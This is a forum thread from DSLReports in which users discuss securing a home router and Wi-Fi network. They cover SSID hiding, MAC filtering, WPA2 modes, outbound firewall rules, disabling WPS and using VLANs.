dslreports logo
site
 
    All Forums Hot Topics Gallery
spc

spacer




how-to block ads


Search Topic:
uniqs
3807
share rss forum feed


Juggernaut
Irreverent or irrelevant?
Premium
join:2006-09-05
Kelowna, BC
kudos:2
reply to norwegian

Re: Router security

said by norwegian:

I'm gathering at some point if internally infected, an external computer that is communicating back and forth can spoof the internal MAC address and the router will then allow more communication? Not quite DMZ status but it would surely be close?

Even if you spoof a MAC to a 'known' device, if the router is secured, you still need to have the login, and PW to gain access to WIFI, or the router.

If it is not secured, and have only a MAC filter, you're toast. You can spoof a MAC with a program. WIFI (and blue tooth) broadcasts them.
--
Better to have it and not need it, then need it and not have it.


StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2

2 edits
reply to norwegian

Sounds like you have an integrated modem/router from your ISP. My LAN is behind another 3rd party router. I don't trust what an ISP provides. That has been discussed here before (too lazy to find a link right now).

»Re: Do you trust AT&T with your security?
--
Don't feed trolls--it only makes them grow!



KodiacZiller
Premium
join:2008-09-04
73368
kudos:2

1 recommendation

reply to Shady Bimmer

said by Shady Bimmer:

WPA = Wi-Fi Protected Access, the next-generation security protocol after WEP. WPA has been deemed weak against brute-force attacks.

Only partially true. WPA only has weaknesses when used in TKIP mode. If you enable CCMP/AES mode, those weaknesses do not exist.
--
Getting people to stop using windows is more or less the same as trying to get people to stop smoking tobacco products. They dont want to change; they are happy with slowly dying inside. -- munky99999


Juggernaut
Irreverent or irrelevant?
Premium
join:2006-09-05
Kelowna, BC
kudos:2
reply to StuartMW

Yep, I have my own router, and my ISP's modem. The router is between them, and my network.
--
Better to have it and not need it, then need it and not have it.



norwegian
Premium
join:2005-02-15
Outback
reply to Shady Bimmer

said by Shady Bimmer:

The router/firewall is a layer of protection for the network, which itself is inherently insecure with many points of vulnerability.

Which I am learning more about from the discussion, even though it its the router that seems to be the centre of attention for me.

I didn't just want a "my bob2 is beeping it is infected" topic. These tend to be closed down rather quickly. So I tried a discussion in hopes I could view or review protocols to help understand more generally about setting up networks securely from starting with locking down a router and using it to it's full potential.

Sorry to all if I've mislead you a little.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke



norwegian
Premium
join:2005-02-15
Outback
reply to StuartMW

said by StuartMW:

Sounds like you have an integrated modem/router from your ISP. My LAN is behind another 3rd party router. I don't trust what an ISP provides. That has been discussed here before (too lazy to find a link right now).

»Re: Do you trust AT&T with your security?

It is a Bob2 supplied by the vendor.

I have another router here, but had troubles setting up the second router, or understanding what security needs to be in place with the addressing and configurations. We discussed piggy backing routers here once or twice and consensus was equally bad v's good for this method. I doubt turning it into a bridge would help my wireless clients with protection.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke



StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2
reply to norwegian

said by norwegian:

I didn't just want a "my bob2 is beeping it is infected" topic.

If it starts beeping rapidly I'd be inclined to, um, run
--
Don't feed trolls--it only makes them grow!


Juggernaut
Irreverent or irrelevant?
Premium
join:2006-09-05
Kelowna, BC
kudos:2
reply to norwegian

One other thing to do, as it seems to have been missed. Use a SW FW as well, to stop stuff from going out. It's another layer for security.
--
Better to have it and not need it, then need it and not have it.



StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2

1 recommendation

And/or configure your own (custom) outgoing firewall rules in your router.
--
Don't feed trolls--it only makes them grow!



norwegian
Premium
join:2005-02-15
Outback
reply to Juggernaut

said by Juggernaut:

Even if you spoof a MAC to a 'known' device, if the router is secured, you still need to have the login, and PW to gain access to WIFI, or the router.

If it is not secured, and have only a MAC filter, you're toast. You can spoof a MAC with a program. WIFI (and blue tooth) broadcasts them.

This is set up with a default SSID but the passphase is my own.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke



Juggernaut
Irreverent or irrelevant?
Premium
join:2006-09-05
Kelowna, BC
kudos:2

That's an important part.

But, if it's your telco's unit, they have a backdoor to reset it for access. Better to have your router in between it, and your network.
--
Better to have it and not need it, then need it and not have it.



StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2

said by Juggernaut:

But, if it's your telco's unit, they have a backdoor...

And if they do so does ASIO/The NSA/et al But if you have a "Bob2" that's a given.
--
Don't feed trolls--it only makes them grow!


norwegian
Premium
join:2005-02-15
Outback
reply to KodiacZiller

You have me a little curious on this.

said by KodiacZiller:

said by norwegian:


2. Hide SSID and only show it to allow the connection to happen before hiding it, use WPA2 as well.

Hiding the SSID has zero benefit.

Hiding the SSID does nothing?

said by KodiacZiller:

said by norwegian:

2. Set specific MAC addresses.

MAC filtering has little if any benefit.



Setting specific MAC address filtering is not worth a concern?
Can you elaborate on this, as setting MAC addressing was 1 of my "to do" jobs but you suggest I'm wasting my time, I gather because they can be spoofed?

said by KodiacZiller:

The best steps you can take to secure a router are:

1) Set a strong WPA2 password.

2) Turn off any remote administering of the router unless you really need it.

This I have done.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke



norwegian
Premium
join:2005-02-15
Outback
reply to Juggernaut

said by Juggernaut:

One other thing to do, as it seems to have been missed. Use a SW FW as well, to stop stuff from going out. It's another layer for security.

said by StuartMW:

And/or configure your own (custom) outgoing firewall rules in your router.

I do have a firewall on all items, but to set serious filtering is a big task, software needs configuring, Microsoft services needs configuring, etc, etc.

I hear just allowing udp port 53 for DNS and UDP/TCP on port 80 for Internet is a good start.

Still it is not a simple 5 minute job eiter?
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke



norwegian
Premium
join:2005-02-15
Outback
reply to Juggernaut

said by Juggernaut:

That's an important part.

But, if it's your telco's unit, they have a backdoor to reset it for access. Better to have your router in between it, and your network.

So I should have set up my own router and wireless access point and not gone the path of "bundled package". Even if it does leave me to diagnose my own hardware which I think isn't a hard task.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke



Juggernaut
Irreverent or irrelevant?
Premium
join:2006-09-05
Kelowna, BC
kudos:2

Yes. I have my own router, and my ISP's modem. And no, it's not a hard task.
--
Better to have it and not need it, then need it and not have it.



KodiacZiller
Premium
join:2008-09-04
73368
kudos:2
reply to norwegian

said by norwegian:

Hiding the SSID does nothing?

Absolutely nothing. Any war-driver with Backtrack can sniff hidden SSID's by default. Just about all war-driving software on any platform can do it.

said by norwegian:

Setting specific MAC address filtering is not worth a concern?
Can you elaborate on this, as setting MAC addressing was 1 of my "to do" jobs but you suggest I'm wasting my time, I gather because they can be spoofed?



What happens is an attacker will sit outside and use a tool like ethereal to sniff the traffic on your network. While he can't actually see the data (since it is encrypted) he can see other information like the MAC addresses of clients. So, once he determines what the legit MAC addresses are, he runs a tool like ifconfig and changes his own MAC to match yours. It's trivial and only takes a minute.
--
Getting people to stop using windows is more or less the same as trying to get people to stop smoking tobacco products. They dont want to change; they are happy with slowly dying inside. -- munky99999


norwegian
Premium
join:2005-02-15
Outback


Okay, this is where "Security by Obscurity" comes into play - if your firewall is ping able or not really makes no difference to the end result. Hidden or not you have to be track-able to some extent (without talking proxies).



norwegian
Premium
join:2005-02-15
Outback
reply to KodiacZiller

said by KodiacZiller:

said by norwegian:

Hiding the SSID does nothing?

Absolutely nothing. Any war-driver with Backtrack can sniff hidden SSID's by default. Just about all war-driving software on any platform can do it.

Interesting that you bought this up.

Found this interesting:-

»www.youtube.com/watch?v=xuO5X1KlPDE

--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke



Juggernaut
Irreverent or irrelevant?
Premium
join:2006-09-05
Kelowna, BC
kudos:2
reply to norwegian

I make my router pingable. Why wouldn't I? It doesn't make a difference, anymore than hiding the SSID would. And, that is none.
--
Better to have it and not need it, then need it and not have it.



norwegian
Premium
join:2005-02-15
Outback
reply to Juggernaut

said by Juggernaut:

Yes. I have my own router, and my ISP's modem. And no, it's not a hard task.

I guess my problem is:

Modem is broken, invested in an all in one - Bob2

I have an old modem Netcomm 4+ replaced with Dlink (started playing up) to work with. I also have a Belkin wireless router and a plain router.

Maybe I need to revisit using the old gear or turning off the wireless in Bob2 and making it a bridge to the next router. Bit of playing around but might be worth looking at.

Whether it stops the beeps who knows, but this Bob2 modem/wireless router does have a beep no other hardware had.
Guess I need to test electrical currents to see if there is an issue for the hardware there.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke



StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2

2 edits
reply to norwegian

said by norwegian:

Still it is not a simple 5 minute job eiter?

No it isn't. It's up to you as to how serious you want to be about security.

I don't know how many people configure their own firewall(s), incoming and outgoing, but I've been doing it since getting my first (non-integrated) router in 2000 or so.

I bought and read this book as a guide.

Building Internet Firewalls

Also I have a Syslog server that logs stuff. Again it's up to you how far you want to go but most of the effort is one-time.
--
Don't feed trolls--it only makes them grow!


StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2
reply to norwegian

said by norwegian:

Okay, this is where "Security by Obscurity" comes into play...

There's no such thing on the internet. It doesn't matter where you live, New York city or a shack in Siberia, you will be found,
--
Don't feed trolls--it only makes them grow!


StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2
reply to norwegian

BTW this whole thread has got me thinking about what devices I have on wi-fi. With a little bit of work (hardware + firewall setup) I could make some of them hardwired (cabled). That'd just decrease the probability that they could be reached.
--
Don't feed trolls--it only makes them grow!



workablob

join:2004-06-09
Houston, TX
kudos:2
reply to norwegian

Disable WPS if you can.

Linksys gives the illusion of allowing one to disable it but it is just an illusion.

DDWRT will let you do it.

Dave
--
I may have been born yesterday. But it wasn't at night.



StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2

said by workablob:

Disable WPS if you can.

Agreed. WPS is broken.

»WiFi Protected Setup PIN brute force vulnerability

Fortunately my (older) router doesn't support WPS.
--
Don't feed trolls--it only makes them grow!


rcdailey
Dragoonfly
Premium
join:2005-03-29
Rialto, CA
Reviews:
·Time Warner Cable
reply to StuartMW

Yeah, everything I've read says that hiding SSID is useless. I have done it only to keep casual users from trying to connect, but that probably just ensures that the only attempts will be malicious or non-casual. The router wifi is secured anyway with a strong password in WPA2 and also the administrator name and password are unique and remote administration is disabled. There's really no need for remote administration for most people, anyway, is there?

The key remains LAN access, doesn't it. How does one log onto the LAN, users and user levels, passwords, etc? If it is easy to log onto the LAN locally, then once the wifi connection and strong password are known, logging onto the LAN will also be easy, won't it?
--
It is easier for a camel to put on a bikini than an old man to thread a needle.



rcdailey
Dragoonfly
Premium
join:2005-03-29
Rialto, CA
Reviews:
·Time Warner Cable
reply to StuartMW

I have a really old D-Link at home that is not wireless, so I don't have to worry about that one, at least when it comes to WPS. I have verified that the wireless router at an office I have some responsibility for is not vulnerable to that attack because it does not support WPS.
--
It is easier for a camel to put on a bikini than an old man to thread a needle.



EGeezer
Go Cats
Premium
join:2002-08-04
Midwest
kudos:8
Reviews:
·Callcentric

1 recommendation

reply to norwegian

I suggest investigating VLANs as a possible security feature. It essentially lets you define specific paths between specific points and a trunk connection to border routers or shared printers. Since VLAN switches provide layer 2 data link level switching, they are impervious to many of the LAN side malware spreading exploits extant today.

Configuration isn't a trivial matter, but once it's set up, it's low maintenance.

Here's a couple of educational links to review the subject;

»computer.howstuffworks.com/lan-switch15.htm

See »www.cisco.com/web/about/ac123/ac···ion.html

For a nice discussion on wireless router hardening, see
»Harden your router/AP in five steps



StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2

said by EGeezer:

I suggest investigating VLANs as a possible security feature.

That's what I'm considering doing as my router supports VLAN's.

But as you said it's not trivial to configure and I want to think about the implications (what can talk to what etc) before I dive in.
--
Don't feed trolls--it only makes them grow!